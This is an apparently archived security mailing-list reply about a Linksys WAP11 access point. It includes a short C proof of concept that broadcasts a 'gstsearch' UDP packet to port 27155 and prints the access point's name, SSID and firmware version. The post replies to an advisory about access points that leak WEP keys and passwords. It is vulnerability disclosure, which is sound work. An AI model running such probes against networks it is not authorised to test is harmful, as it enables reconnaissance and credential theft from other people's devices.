Hi,

Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only
returns AP's name,
SSID and firmware version. Except for firmware version, those are not
private informations.

Quickly patched proof of concept :

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>

typedef struct {
char type[28];
char blank1[8];
char apname[32];
char firmware[6];
char blank2[11];
char ssid[32];
}
__attribute__ ((packed)) answer;

int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);

sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd < 0)
perror("socket");

val = 1;
ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
if (ret < 0)
{
perror("setsockopt");
exit(1);
}

ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
if (ret < 0)
{
perror("sendto");
exit(1);
}

ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));
if (ret > 0)
{
printf("Type : %s\n", ans->type);
printf("Announced Name : %s\n", ans->apname);
printf("Firmware version : %s\n", ans->firmware);
printf("SSID : %s\n", ans->ssid);
}
else
perror("read");
return 0;
}

thomas

>KHAMSIN Security News
>KSN Reference: 2002-11-01 0001 ULO
>-----------------------------------------------------------------------
----
>
>Title
>-----
> Accesspoints disclose wep keys, password and mac filter
>
>Date
>----
> 2002-11-01
>
>
>
>
>

[ reply ]